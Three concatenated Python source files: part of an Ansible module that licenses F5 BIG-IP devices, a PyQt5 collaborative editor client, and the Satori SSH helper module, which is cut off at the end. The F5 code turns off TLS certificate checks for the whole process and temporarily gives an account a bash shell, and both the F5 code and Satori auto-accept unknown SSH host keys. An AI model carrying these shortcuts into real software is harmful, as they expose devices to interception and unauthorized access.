self.cli = None
self._validate_certs = module.params.get('validate_certs')
self.client = bigsuds.BIGIP(
hostname=self.hostname,
username=self.username,
password=self.password,
debug=True
)
def test_license_server(self):
server = self.license_server
wsdl = self.wsdl
if wsdl:
url = 'file://%s' % wsdl
else:
url = 'https://%s/license/services/urn:com.f5.license.v5b.ActivationService?wsdl' % server
try:
if server == LIC_INTERNAL:
if hasattr(ssl, 'SSLContext'):
ssl._create_default_https_context = ssl._create_unverified_context
# Specifying the location here is required because the URLs in the
# WSDL for activate specify http but the URL we are querying for
# here is https. Something is weird in suds and causes the following
# to be returned
#
# <h1>/license/services/urn:com.f5.license.v5b.ActivationService</h1>
# <p>Hi there, this is an AXIS service!</p>
# <i>Perhaps there will be a form for invoking the service here...</i>
#
if self._validate_certs:
client = suds.client.Client(url=url, location=url, timeout=10)
else:
client = suds.client.Client(url, timeout=10)
result = client.service.ping()
if result:
return True
else:
return False
except SAXParseException:
return False
def get_license_activation_status(self):
"""Returns the license status
This method will return the license activation status of a BIG-IP. The
following statuses may be returned by this method.
STATE_DISABLED when it is not licensed
STATE_ENABLED when it is licensed
"""
return self.client.Management.LicenseAdministration.get_license_activation_status()
def read_account(self):
self._uri = 'https://%s/mgmt/tm/auth/user/%s' % (self.hostname, self.username)
self._headers = {
'Content-Type': 'application/json'
}
try:
resp = requests.get(self._uri,
auth=(self.username, self.password),
verify=self._validate_certs)
except requests.exceptions.SSLError:
raise SSLCertVerifyError
if resp.status_code != 200:
raise Exception('Failed to query the REST API')
else:
return resp.json()
def appliance_mode(self):
"""Checks for appliance mode
Appliance mode is simply having your shell set to "tmsh". This mode
prevents you from running arbitrary system commands. For this module,
however, we need to ensure that Appliance Mode is not enabled for
the account used to connect to the BIG-IP device.
If it is, we will not be able to reload the license correctly and the
APIs will continue to report the previous status of the license even
after we have removed it from disk
"""
result = self.read_account()
if 'shell' in result and result['shell'] == 'tmsh':
return True
else:
return False
def can_have_advanced_shell(self):
"""Ensure account can use an advanced shell
Only a few types of roles are allowed to use the advanced shell.
Since we need to use this shell when making a license 'absent'
on the system, we need to check to see if the user is assigned a
role that is allowed to have an advanced shell
"""
roles = []
can_have_advanced = ['resource-admin', 'admin']
user_data = self.read_account()
pa = user_data['partitionAccess']
roles = set([p['role'] for p in pa])
found = [x for x in roles if x in can_have_advanced]
if len(found) > 0:
return True
else:
return False
def set_shell(self, shell):
payload = {}
shell = str(shell)
if shell == '/bin/bash':
shell = 'bash'
elif shell == '/sbin/nologin':
shell = 'none'
elif shell == '/usr/bin/tmsh':
shell = 'tmsh'
payload['shell'] = shell
uri = 'https://%s/mgmt/tm/auth/user/%s' % (self.hostname, self.username)
self._headers = {
'Content-Type': 'application/json',
'Connection': 'close'
}
requests.put(uri,
auth=(self.username, self.password),
data=json.dumps(payload),
verify=self._validate_certs)
def absent(self):
"""Removes a license from a device
This method will remove a license completely from a system and reload
the configuration so that it is reporting as removed in the APIs.
Notes about this method:
It detects admin-ness and changes the connecting account's shell
temporarily.
There is no API command that can be used to remove a license.
Therefore, my workaround is to use the SOAP API to delete the file
directly from the server.
This works to remove the license, but the system will not be aware
that the license has been removed. To make the system aware of this
you need to run the 'reloadlic' command from the advanced shell as
there is no way to run an equivalent command from any API.
The advanced shell is only available to two roles.
To negate the need to specify a special account to connect with
in this module, we change the shell of the connecting user to be
the advanced shell. Afterwards we set the shell back to what it
was before we changed it.
There is a small risk that during the time that the shell is exposed
that someone could connect to the system and have interactive access
to the device. Since this module is one that should be used fairly
infrequently in practice, I think the risk to the owner of the device
during this brief period of time is minimal.
This behavior is only needed for the 'absent' state and in future
versions of our products this process may be unnecessary due to
enhancements in the APIs that correctly reload the license status
if it changes through the API
"""
licenses = [
'/config/bigip.license',
'/config/bigiq.license'
]
# Because this account may need to adjust your shell to run the
# 'reloadlic' command, you must be running this module with an
# account that has the privileges necessary to have an advanced
# shell.
#
# Usually this is the 'admin' account. If you do not have the
# required role though, we need to stop further work
if not self.can_have_advanced_shell():
raise UnprivilegedAccountError
# Start by reading in the current shell.
#
# This is being done so that if we need to set the shell to the
# advanced shell, we will know what shell to set the account back
# to after we are done.
user_data = self.read_account()
# There is the possibility that there will be no shell specified
# in the account details. The REST API does not list a shell if
# the console has been deactivated for the account
if 'shell' in user_data:
if user_data['shell'] != 'bash':
self.set_shell('bash')
else:
self.set_shell('bash')
self.cli = paramiko.SSHClient()
if not self._validate_certs:
self.cli.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.cli.connect(self.hostname, username=self.username, password=self.password)
# I am deleting all of the BIG-IP and BIG-IQ licenses so that this
# module can be used by both devices
for license in licenses:
# If the file does not exist, the SOAP client will raise an
# exception. Handle it and move on
try:
self.client.System.ConfigSync.delete_file(license)
except bigsuds.ServerError:
pass
# The reloadlic command is used to refresh the state that is
# reported by the APIs. If this is not done, then the existing
# state reported does not change from STATE_ENABLED
cmd = "/usr/bin/reloadlic"
stdin, stdout, stderr = self.cli.exec_command(cmd)
self.cli.close()
# reloadlic doesn't actually return anything, and it also doesn't
# correctly report back its status upon failure (for example by
# exiting with a return code greater than zero).
#
# So the only way to really know if the license was successfully
# deleted is to recheck the state of the license
stop_time = time.time() + 60
while True:
status = self.get_license_activation_status()
if status == 'STATE_DISABLED':
break
elif time.time() >= stop_time:
# ensure we do not run forever
break
time.sleep(1)
if 'shell' in user_data:
shell = user_data['shell']
if shell == 'bash':
shell = '/bin/bash'
elif shell == 'none':
shell = '/sbin/nologin'
elif shell == 'tmsh':
shell = '/usr/bin/tmsh'
stop_time = time.time() + 60
while True:
self.set_shell(shell)
time.sleep(5)
resp = self.client.Management.UserManagement.get_login_shell([self.username])
if resp[0] == shell:
break
elif time.time() >= stop_time:
# ensure we do not run forever
break
time.sleep(5)
return True
class BigIpLicenseIControl(BigIpLicenseCommon):
def __init__(self, module):
super(BigIpLicenseIControl, self).__init__(module)
self.eula_file = 'LICENSE.F5'
self.license = None
self.dossier = None
self.license_file = module.params.get('license_file')
self.dossier_file = module.params.get('dossier_file')
self.regkey = module.params.get('key')
self.license_options = {
'eula': '',
'email': '',
'firstname': '',
'lastname': '',
'company': '',
'phone': '',
'jobtitle': '',
'address': '',
'city': '',
'state': '',
'postalcode': '',
'country': ''
}
self.license_server = None
self.wsdl = module.params.get('wsdl')
license_options = module.params.get('license_options')
if license_options:
tmp = dict(self.license_options.items() + license_options.items())
self.license_options = tmp
def get_license(self):
if self.wsdl:
url = 'file://%s' % self.wsdl
else:
url = 'https://%s/license/services/urn:com.f5.license.v5b.ActivationService?wsdl' % self.license_server
client = suds.client.Client(url=url, location=url)
resp = client.service.getLicense(
self.dossier,
self.license_options['eula'],
self.license_options['email'],
self.license_options['firstname'],
self.license_options['lastname'],
self.license_options['company'],
self.license_options['phone'],
self.license_options['jobtitle'],
self.license_options['address'],
self.license_options['city'],
self.license_options['state'],
self.license_options['postalcode'],
self.license_options['country'],
)
return resp
def get_dossier(self, key):
response = self.client.Management.LicenseAdministration.get_system_dossier(
registration_keys=[key]
)
self.dossier = response
return response
def install_license(self, license):
license = base64.b64encode(license)
self.client.Management.LicenseAdministration.install_license(
license_file_data=license
)
status = self.get_license_activation_status()
if status == 'STATE_ENABLED':
return True
else:
return False
def upload_eula(self, eula):
file_name = '/%s' % self.eula_file
self.client.System.ConfigSync.upload_file(
file_name=file_name,
file_context=dict(
file_data=base64.b64encode(eula),
chain_type='FILE_FIRST_AND_LAST'
)
)
def present(self):
if is_production_key(self.regkey):
license_server = LIC_EXTERNAL
else:
license_server = LIC_INTERNAL
self.license_server = license_server
if self.license_file:
fh = open(self.license_file)
self.license = fh.read()
fh.close()
if self.dossier_file:
fh = open(self.dossier_file)
self.dossier = fh.read()
fh.close()
lic_status = self.get_license_activation_status()
lic_server = self.test_license_server()
if not lic_server and lic_status == 'STATE_DISABLED':
raise UnreachableActivationServerError
if not self.dossier:
self.get_dossier(self.regkey)
if not self.dossier:
raise DossierNotGeneratedError
resp = self.get_license()
if resp.state == "EULA_REQUIRED":
# Extract the eula offered from first try
eula_string = resp.eula
self.license_options['eula'] = eula_string
resp = self.get_license()
# Try again, this time with eula populated
if resp.state == 'LICENSE_RETURNED':
big_license = resp.license
if big_license:
self.upload_eula(resp.eula)
else:
raise NoLicenseReturnedError(resp.fault.faultText)
if self.install_license(big_license):
return True
else:
return False
def main():
changed = False
module = AnsibleModule(
argument_spec=dict(
dossier_file=dict(),
server=dict(required=True),
key=dict(required=False),
license_file=dict(),
license_options=dict(type='dict'),
password=dict(required=True),
state=dict(default='present', choices=['absent', 'present', 'latest']),
user=dict(required=True, aliases=['username']),
validate_certs=dict(default='yes', type='bool'),
wsdl=dict(default=None)
)
)
state = module.params.get('state')
try:
common = BigIpLicenseCommon(module)
lic_status = common.get_license_activation_status()
if state == "present" and lic_status == 'STATE_ENABLED':
module.exit_json(changed=False)
if state == "absent" and lic_status == 'STATE_DISABLED':
module.exit_json(changed=False)
if state == "present" or state == "latest":
if not bigsuds_found:
raise Exception("The python bigsuds module is required")
obj = BigIpLicenseIControl(module)
if obj.present():
changed = True
else:
module.fail_json(msg="License not installed")
elif state == 'absent':
if not paramiko_found:
raise Exception("The python paramiko module is required")
result = common.absent()
if result:
changed = True
else:
module.fail_json(msg="License not removed")
module.exit_json(changed=changed)
except bigsuds.ConnectionError:
module.fail_json(msg="Could not connect to BIG-IP host")
except socket.timeout:
module.fail_json(msg="Timed out connecting to the BIG-IP")
except UnreachableActivationServerError:
module.fail_json(changed=False, msg="Could not reach the specified activation server to license BIG-IP")
except DossierNotGeneratedError:
module.fail_json(changed=False, msg="Dossier not generated")
except NoLicenseReturnedError as e:
module.fail_json(msg=str(e))
except SSLCertVerifyError:
module.fail_json(msg="SSL certificate verification failed. Use validate_certs=no to bypass this")
except UnprivilegedAccountError:
module.fail_json(msg="You account does not have permission to reload the license!")
from ansible.module_utils.basic import *
from ansible.module_utils.f5 import *
if __name__ == '__main__':
main()
|
|
from PyQt5 import QtCore, QtGui, QtWidgets
from ctxt.client.ui_connect import Ui_ConnectDialog
from ctxt.client.ui_main import Ui_MainWindow
import ctxt.protocol as cp
import ctxt.util as cu
import logging
class ConnectDialog(QtWidgets.QDialog):
"""
Connection dialog.
"""
def __init__(self, parent, address, port, docname, nickname):
super(ConnectDialog, self).__init__(parent)
self.log = logging.getLogger("CT.Client.ConnectDlg")
# pyuic5 ../../ui/connect.ui -o ui_connect.py
# Loads the UI from the generated python file.
self.content = Ui_ConnectDialog()
self.content.setupUi(self)
self.content.buttonBox.accepted.connect(self.do_connect)
self.content.buttonBox.rejected.connect(self.do_cancel)
self.content.editAddress.setText(address)
self.content.editPort.setText(str(port))
self.content.editName.setText(nickname)
self.content.editDoc.setText(docname)
def do_connect(self):
"""
The "Ok" handler.
"""
self.address = self.content.editAddress.text()
self.port = int(self.content.editPort.text())
self.nickname = self.content.editName.text()
self.docname = self.content.editDoc.text()
def do_cancel(self):
"""
The "Cancel" handler.
"""
self.address = None
self.port = None
self.nickname = None
self.docname = None
@staticmethod
def ask_connection_info(parent, address, port, docname, nickname):
"""
Ask the user for connection parameters.
The function arguments are taken as the default values.
"""
# Pop the modal dialog.
dlg = ConnectDialog(parent, address, port, docname, nickname)
result = dlg.exec_()
# Fetch its results.
return (result == QtWidgets.QDialog.Accepted, dlg.address, dlg.port, dlg.nickname, dlg.docname)
class MainWindow(QtWidgets.QMainWindow):
"""
The main window with the text editor.
"""
def __init__(self, client, address="localhost", port=7777, docname="test", nickname="Anon"):
super(MainWindow, self).__init__()
self.log = logging.getLogger("CT.Client.MainWnd")
self.client = client
self.update_interval = 0.1
# pyrcc5 ../../ui/resources.qrc -o resources_rc.py
# pyuic5 ../../ui/main.ui -o ui_main.py
# Loads the UI from the generated python file.
self.content = Ui_MainWindow()
self.content.setupUi(self)
self.content.actionConnect.triggered.connect(self.show_connect)
# Install an event filter on the text box.
self.content.textEdit.installEventFilter(self)
# Though, disable the text editor until we've managed to join a document.
self.content.textEdit.setDisabled(True)
self.set_address(address)
self.set_port(port)
self.set_nickname(nickname)
self.set_docname(docname)
self.doc_ver = 0
self.active_commit = {"version":0, "sequence":[]}
# Start the update timer
self.update_timer = QtCore.QTimer()
self.update_timer.setSingleShot(False)
self.update_timer.timeout.connect(self.update)
self.update_timer.start(int(self.update_interval * 1000))  # QTimer.start() takes milliseconds
self.show()
def set_address(self, address):
"""
Set server IP address or hostname.
"""
self.conn_address = address
def set_port(self, port):
"""
Set server port to connect to.
"""
self.conn_port = int(port)
def set_nickname(self, nickname):
"""
Set our nickname.
"""
self.nickname = nickname
def set_docname(self, docname):
"""
Set the document name to join.
"""
if len(docname) < 1 or len(docname) > 128:
self.docname = "test"
self.log.error("Invalid document name \"{}\"".format(docname))
else:
self.docname = docname
def show_connect(self):
"""
Handler for the "Connect" button.
Shows a pop-up dialog for specifying
connection parameters.
"""
conn = ConnectDialog.ask_connection_info(
self,
self.conn_address, self.conn_port,
self.docname, self.nickname)
if conn[0]:
self.set_address(conn[1])
self.set_port(conn[2])
self.set_nickname(conn[3])
self.set_docname(conn[4])
self.do_connect()
def do_connect(self):
"""
Connect to the server and join the document.
"""
if self.client.connect(self.conn_address, self.conn_port):
self.client.join_doc(self.nickname, self.docname)
def eventFilter(self, widget, event):
"""
Catch events in the text box.
"""
if event.type() == QtCore.QEvent.KeyPress and widget == self.content.textEdit:
key = event.key()
u = unicode(event.text())
if key in [QtCore.Qt.Key_Return, QtCore.Qt.Key_Enter]:
self.req_insert('\n')
elif key == QtCore.Qt.Key_Backspace:
# Support for Ctrl+Backspace (removes the previous word).
if event.modifiers() & QtCore.Qt.ControlModifier:
self.req_remove_word(-1)
else:
self.req_remove(-1)
elif key == QtCore.Qt.Key_Delete:
# Support for Ctrl+Delete (removes the next word).
if event.modifiers() & QtCore.Qt.ControlModifier:
self.req_remove_word(1)
else:
self.req_remove(1)
elif key == QtCore.Qt.Key_Escape:
self.close()
elif cu.u_is_printable(u):
self.req_insert(u)
# Handle the rest
return QtWidgets.QWidget.eventFilter(self, widget, event)
def req_insert(self, text):
"""
Generate a text insertion request.
"""
cursor = self.content.textEdit.textCursor().position()
d = {
"id": cp.Protocol.RES_INSERT,
"cursor": cursor,
"text": text,
"name": self.nickname
}
self.active_commit["sequence"].append(d)
def req_remove(self, length):
"""
Generate a text removal request.
"""
cursor = self.content.textEdit.textCursor().position()
# We shouldn't send negative length to the server.
# So, we'll remap the cursor position and length.
if length < 0:
length = abs(length)
cursor -= length
# And produce the message.
d = {
"id": cp.Protocol.RES_REMOVE,
"cursor": cursor,
"length": length,
"name": self.nickname
}
self.active_commit["sequence"].append(d)
def req_remove_word(self, direction):
"""
Generate a request to remove a word
relative to the cursor position.
"""
# Select the word left or right to the cursor.
cursor = self.content.textEdit.textCursor()
if direction > 0:
cursor.movePosition(QtGui.QTextCursor.WordRight, QtGui.QTextCursor.KeepAnchor)
else:
cursor.movePosition(QtGui.QTextCursor.WordLeft, QtGui.QTextCursor.KeepAnchor)
# Get selection length
length = cursor.selectionEnd() - cursor.selectionStart()
# And produce the message.
d = {
"id": cp.Protocol.REQ_REMOVE,
"cursor": cursor.selectionStart(),
"length": length,
"name": self.nickname
}
self.active_commit["sequence"].append(d)
def process_commit(self, commit):
"""
Process a commit message.
"""
for op in commit.sequence:
self.log.debug("Processing commit {}".format(op))
op_id = op["id"]
if "name" in op:
op_name = op["name"]
if "cursor" in op:
op_cursor = op["cursor"]
if "length" in op:
op_len = op["length"]
if "text" in op:
op_text = op["text"]
# NOTE:: Remove this, eventually
if op_name == self.nickname:
continue
# Someone inserted some text?
if op_id == cp.Protocol.RES_INSERT:
self.log.debug(u"{} inserted at {}: \"{}\"".format(
op_name, op_cursor, op_text))
# Generate a cursor at the desired position
# and insert the text there.
cursor = self.content.textEdit.textCursor()
cursor.setPosition(op_cursor)
cursor.insertText(op_text)
# Someone removed some text?
elif op_id == cp.Protocol.RES_REMOVE:
self.log.debug(u"{} removed {}-{}".format(
op_name, op_cursor, op_len))
# Generate the desired selection and remove the text.
cursor = self.content.textEdit.textCursor()
cursor.setPosition(op_cursor)
cursor.movePosition(QtGui.QTextCursor.Right, QtGui.QTextCursor.KeepAnchor, op_len)
cursor.removeSelectedText()
def update(self):
"""
Check for any updates from the server,
and schedule the next update.
"""
if not self.client.online:
return
# Send the active commit.
if self.active_commit["sequence"] != []:
self.active_commit["version"] = self.doc_ver
print("Sending commit {}".format(self.active_commit))
self.client.commit(self.active_commit)
# Reset the commit
self.active_commit["sequence"] = []
self.client.update()
# Anything in the queue?
if not self.client.queue_sc.empty():
msg = self.client.queue_sc.get()
# We've joined? Party?
if msg.id == cp.Protocol.RES_OK and msg.req_id == cp.Protocol.REQ_JOIN:
pass
# We've received full text?
elif msg.id == cp.Protocol.RES_TEXT:
self.content.textEdit.setText(msg.text)
# Enable the text editor
self.content.textEdit.setDisabled(False)
# A new commit?
elif msg.id == cp.Protocol.RES_COMMIT:
self.log.debug("Received commit {:08X}".format(msg.version))
# TODO:: Merging here
self.process_commit(msg)
def closeEvent(self, event):
"""
Handler for the window close event.
"""
self.client.close()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""SSH Module for connecting to and automating remote commands.
Supports proxying through an ssh tunnel ('gateway' keyword argument.)
To control the behavior of the SSH client, use the specific connect_with_*
calls. The .connect() call behaves like the ssh command and attempts a number
of connection methods, including using the current user's ssh keys.
If interactive is set to true, the module will also prompt for a password if no
other connection methods succeeded.
Note that test_connection() calls connect(). To test a connection and control
the authentication methods used, just call connect_with_* and catch any
exceptions instead of using test_connection().
"""
import ast
import getpass
import logging
import os
import re
import time
import paramiko
import six
from satori import errors
from satori import utils
LOG = logging.getLogger(__name__)
MIN_PASSWORD_PROMPT_LEN = 8
MAX_PASSWORD_PROMPT_LEN = 64
TEMPFILE_PREFIX = ".satori.tmp.key."
TTY_REQUIRED = [
"you must have a tty to run sudo",
"is not a tty",
"no tty present",
"must be run from a terminal",
]
def shellquote(s):
r"""Quote a string for use on a command line.
This wraps the string in single-quotes and converts any existing
single-quotes to r"'\''". Here the first single-quote ends the
previous quoting, the escaped single-quote becomes a literal
single-quote, and the last single-quote quotes the next part of
the string.
"""
return "'%s'" % s.replace("'", r"'\''")
def make_pkey(private_key):
"""Return a paramiko.pkey.PKey from private key string."""
key_classes = [paramiko.rsakey.RSAKey,
paramiko.dsskey.DSSKey,
paramiko.ecdsakey.ECDSAKey, ]
keyfile = six.StringIO(private_key)
for cls in key_classes:
keyfile.seek(0)
try:
pkey = cls.from_private_key(keyfile)
except paramiko.SSHException:
continue
else:
keytype = cls
LOG.info("Valid SSH Key provided (%s)", keytype.__name__)
return pkey
raise paramiko.SSHException("Is not a valid private key")
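# Illustrative sketch (not part of the original module): reading a private key
# string from disk and turning it into a paramiko PKey via make_pkey(). The
# path below is a placeholder, not a value taken from this codebase.
def _example_make_pkey_from_file():
    with open('/path/to/id_rsa') as keyfile:
        return make_pkey(keyfile.read())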
def connect(*args, **kwargs):
"""Connect to a remote device over SSH."""
try:
return SSH.get_client(*args, **kwargs)
except TypeError as exc:
msg = "got an unexpected"
if msg in str(exc):
message = "%s " + str(exc)[str(exc).index(msg):]
raise exc.__class__(message % "connect()")
raise
class AcceptMissingHostKey(paramiko.client.MissingHostKeyPolicy):
"""Allow connections to hosts whose fingerprints are not on record."""
# pylint: disable=R0903
def missing_host_key(self, client, hostname, key):
"""Add missing host key."""
# pylint: disable=W0212
client._host_keys.add(hostname, key.get_name(), key)
class SSH(paramiko.SSHClient): # pylint: disable=R0902
"""Connects to devices via SSH to execute commands."""
# pylint: disable=R0913
def __init__(self, host, password=None, username="root", private_key=None,
root_password=None, key_filename=None, port=22,
timeout=20, gateway=None, options=None, interactive=False):
"""Create an instance of the SSH class.
:param str host: The ip address or host name of the server
to connect to
:param str password: A password to use for authentication
or for unlocking a private key
:param username: The username to authenticate as
:param root_password: root user password to be used if 'username'
is not root. This will use 'username' and
'password' to log in and then 'su' to root
using root_password
:param private_key: Private SSH Key string to use
(instead of using a filename)
:param key_filename: a private key filename (path)
:param port: tcp/ip port to use (defaults to 22)
:param float timeout: an optional timeout (in seconds) for the
TCP connection
:param socket gateway: an existing SSH instance to use
for proxying
:param dict options: A dictionary used to set ssh options
(when proxying).
e.g. for `ssh -o StrictHostKeyChecking=no`,
you would provide
(.., options={'StrictHostKeyChecking': 'no'})
Conversion of booleans is also supported,
(.., options={'StrictHostKeyChecking': False})
is equivalent.
:keyword interactive: If true, prompt for password if missing.
"""
self.password = password
self.host = host
self.username = username or 'root'
self.root_password = root_password
self.private_key = private_key
self.key_filename = key_filename
self.port = port or 22
self.timeout = timeout
self._platform_info = None
self.options = options or {}
self.gateway = gateway
self.sock = None
self.interactive = interactive
self.escalation_command = 'sudo -i %s'
if self.root_password:
self.escalation_command = "su -c '%s'"
if self.gateway:
if not isinstance(self.gateway, SSH):
raise TypeError("'gateway' must be a satori.ssh.SSH instance. "
"( instances of this type are returned by "
"satori.ssh.connect() )")
super(SSH, self).__init__()
def __del__(self):
"""Destructor to close the connection."""
self.close()
@classmethod
def get_client(cls, *args, **kwargs):
"""Return an ssh client object from this module."""
return cls(*args, **kwargs)
@property
def platform_info(self):
"""Return distro, version, architecture.
Requires >= Python 2.4 on remote system.
"""
if not self._platform_info:
platform_command = "import platform,sys\n"
platform_command += utils.get_source_definition(
utils.get_platform_info)
platform_command += ("\nsys.stdout.write(str("
"get_platform_info()))\n")
command = 'echo %s | python' % shellquote(platform_command)
output = self.remote_execute(command)
stdout = re.split('\n|\r\n', output['stdout'])[-1].strip()
if stdout:
try:
plat = ast.literal_eval(stdout)
except SyntaxError as exc:
plat = {'dist': 'unknown'}
LOG.warning("Error parsing response from host '%s': %s",
self.host, output, exc_info=exc)
else:
plat = {'dist': 'unknown'}
LOG.warning("Blank response from host '%s': %s",
self.host, output)
self._platform_info = plat
return self._platform_info
def connect_with_host_keys(self):
"""Try connecting with locally available keys (ex. ~/.ssh/id_rsa)."""
LOG.debug("Trying to connect with local host keys")
return self._connect(look_for_keys=True, allow_agent=False)
def connect_with_password(self):
"""Try connecting with password."""
LOG.debug("Trying to connect with password")
if self.interactive and not self.password:
LOG.debug("Prompting for password (interactive=%s)",
self.interactive)
try:
self.password = getpass.getpass("Enter password for %s:" %
self.username)
except KeyboardInterrupt:
LOG.debug("User cancelled at password prompt")
if not self.password:
raise paramiko.PasswordRequiredException("Password not provided")
return self._connect(
password=self.password,
look_for_keys=False,
allow_agent=False)
def connect_with_key_file(self):
"""Try connecting with key file."""
LOG.debug("Trying to connect with key file")
if not self.key_filename:
raise paramiko.AuthenticationException("No key file supplied")
return self._connect(
key_filename=os.path.expanduser(self.key_filename),
look_for_keys=False,
allow_agent=False)
def connect_with_key(self):
"""Try connecting with key string."""
LOG.debug("Trying to connect with private key string")
if not self.private_key:
raise paramiko.AuthenticationException("No key supplied")
pkey = make_pkey(self.private_key)
return self._connect(
pkey=pkey,
look_for_keys=False,
allow_agent=False)
def _connect(self, **kwargs):
"""Set up client and connect to target."""
self.load_system_host_keys()
if self.options.get('StrictHostKeyChecking') in (False, "no"):
self.set_missing_host_key_policy(AcceptMissingHostKey())
if self.gateway:
# lazy load
if not self.gateway.get_transport():
self.gateway.connect()
self.sock = self.gateway.get_transport().open_channel(
'direct-tcpip', (self.host, self.port), ('', 0))
return super(SSH, self).connect(
self.host,
timeout=kwargs.pop('timeout', self.timeout),
port=kwargs.pop('port', self.port),
username=kwargs.pop('username', self.username),
pkey=kwargs.pop('pkey', None),
sock=kwargs.pop('sock', self.sock),
**kwargs)
def connect(self): # pylint: disable=W0221
"""Attempt an SSH connection through paramiko.SSHClient.connect.
The order for authentication attempts is:
- private_key
- key_filename
- any key discoverable in ~/.ssh/
- username/password (will prompt if the password is not supplied and
interactive is true)
"""
# idempotency
if self.get_transport():
if self.get_transport().is_active():
return
if self.private_key:
try:
return self.connect_with_key()
except paramiko.SSHException:
pass # try next method
if self.key_filename:
try:
return self.connect_with_key_file()
except paramiko.SSHException:
pass # try next method
try:
return self.connect_with_host_keys()
except paramiko.SSHException:
pass # try next method
try:
return self.connect_with_password()
except paramiko.BadHostKeyException as exc:
msg = (
"ssh://%s@%s:%d failed: %s. You might have a bad key "
"entry on your server, but this is a security issue and "
"won't be handled automatically. To fix this you can remove "
"the host entry for this host from the /.ssh/known_hosts file")
LOG.info(msg, self.username, self.host, self.port, exc)
raise exc
except Exception as exc:
LOG.info('ssh://%s@%s:%d failed. %s',
self.username, self.host, self.port, exc)
raise exc
def test_connection(self):
"""Connect to an ssh server and verify that it responds.
The order for authentication attempts is:
(1) private_key
(2) key_filename
(3) any key discoverable in ~/.ssh/
(4) username/password
"""
LOG.debug("Checking for a response from ssh://%s@%s:%d.",
self.username, self.host, self.port)
try:
self.connect()
LOG.debug("ssh://%s@%s:%d is up.",
self.username, self.host, self.port)
return True
except Exception as exc:
LOG.info("ssh://%s@%s:%d failed. %s",
self.username, self.host, self.port, exc)
return False
finally:
self.close()
def close(self):
"""Close the connection to the remote host.
If an ssh tunnel is being used, close that first.
"""
if self.gateway:
self.gateway.close()
return super(SSH, self).close()
def _handle_tty_required(self, results, get_pty):
"""Determine whether the result implies a tty request."""
if any(m in str(k) for m in TTY_REQUIRED for k in results.values()):
LOG.info('%s requires TTY for sudo/su. Using TTY mode.',
self.host)
if get_pty is True: # if this is *already* True
raise errors.GetPTYRetryFailure(
"Running command with get_pty=True FAILED: %s@%s:%d"
% (self.username, self.host, self.port))
else:
return True
return False
def _handle_password_prompt(self, stdin, stdout, su_auth=False):
"""Determine whether the remote host is prompting for a password.
Respond to the prompt through stdin if applicable.
"""
if not stdout.channel.closed:
buflen = len(stdout.channel.in_buffer)
# min and max determined from max username length
# and a set of encountered linux password prompts
if MIN_PASSWORD_PROMPT_LEN < buflen < MAX_PASSWORD_PROMPT_LEN:
prompt = stdout.channel.recv(buflen)
if all(m in prompt.lower()
for m in ['password', ':']):
LOG.warning("%s@%s encountered prompt! of length "
" [%s] {%s}",
self.username, self.host, buflen, prompt)
if su_auth:
LOG.warning("Escalating using 'su -'.")
stdin.write("%s\n" % self.root_password)
else:
stdin.write("%s\n" % self.password)
stdin.flush()
return True
else:
LOG.warning("Nearly a False-Positive on "
"password prompt detection. [%s] {%s}",
buflen, prompt)
stdout.channel.send(prompt)
return False
def _command_is_already_running(self, command):
"""Check to see if the command is already running using ps & grep."""
# check plain 'command' w/o prefix or escalation
check_cmd = 'ps -ef |grep -v grep|grep -c "%s"' % command
result = self.remote_execute(check_cmd, keepalive=True,
allow_many=True)
if result['stdout'] != '0':
return True
else:
LOG.debug("Remote command %s IS NOT already running. "
"Continuing with remote_execute.", command)
def remote_execute(self, command, with_exit_code=False, # noqa
get_pty=False, cwd=None, keepalive=True,
escalate=False, allow_many=True, **kw):
"""Execute an ssh command on a remote host.
Tries cert auth first and falls back
to password auth if password provided.
:param command: Shell command to be executed by this function.
:param with_exit_code: Include the exit_code in the return body.
:param cwd: The child's current directory will be changed
to `cwd` before it is executed. Note that this
directory is not considered when searching the
executable, so you can't specify the program's
path relative to this argument
:param get_pty: Request a pseudo-terminal from the server.
:param allow_many: If False, do not run command if it is already
found running on remote client.
:returns: a dict with stdin, stdout,
and (optionally) the exit code of the call.
"""
if escalate and self.username != 'root':
run_command = self.escalation_command % command
else:
run_command = command
if cwd:
prefix = "cd %s && " % cwd
run_command = prefix + run_command
# _command_is_already_running won't be called if allow_many is True
# python is great :)
if not allow_many and self._command_is_already_running(command):
raise errors.SatoriDuplicateCommandException(
"Remote command %s is already running and allow_many was "
"set to False. Aborting remote_execute." % command)
try:
self.connect()
results = None
chan = self.get_transport().open_session()
su_auth = False
if 'su -' in run_command:
su_auth = True
get_pty = True
if get_pty:
chan.get_pty()
stdin = chan.makefile('wb')
stdout = chan.makefile('rb')
stderr = chan.makefile_stderr('rb')
LOG.debug("Executing '%s' on ssh://%s@%s:%s.",
run_command, self.username, self.host, self.port)
chan.exec_command(run_command)
LOG.debug('ssh://%s@%s:%d responded.', self.username, self.host,
self.port)
time.sleep(.25)
self._handle_password_prompt(stdin, stdout, su_auth=su_auth)
results = {
'stdout': stdout.read().strip(),
'stderr': stderr.read()
}
LOG.debug("STDOUT from ssh://%s@%s:%d: %.5000s ...",
self.username, self.host, self.port,
results['stdout'])
LOG.debug("STDERR from ssh://%s@%s:%d: %.5000s ...",
self.username, self.host, self.port,
results['stderr'])
exit_code = chan.recv_exit_status()
if with_exit_code:
results.update({'exit_code': exit_code})
if not keepalive:
chan.close()
if self._handle_tty_required(results, get_pty):
return self.remote_execute(
command, with_exit_code=with_exit_code, get_pty=True,
cwd=cwd, keepalive=keepalive, escalate=escalate,
allow_many=allow_many)
return results
except Exception as exc:
LOG.info("ssh://%s@%s:%d failed. | %s", self.username, self.host,
self.port, exc)
raise
finally:
if not keepalive:
self.close()
# Share SSH.__init__'s docstring
connect.__doc__ = SSH.__init__.__doc__
try:
SSH.__dict__['get_client'].__doc__ = SSH.__dict__['__init__'].__doc__
except AttributeError:
SSH.get_client.__func__.__doc__ = SSH.__init__.__doc__
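# Illustrative usage sketch (not part of the original module): the connection
# flow described in the module docstring. The host name, key path and command
# below are placeholders, not values taken from this codebase.
def _example_remote_uptime():
    client = connect('host.example.com', username='root',
                     key_filename='~/.ssh/id_rsa', interactive=False)
    if client.test_connection():
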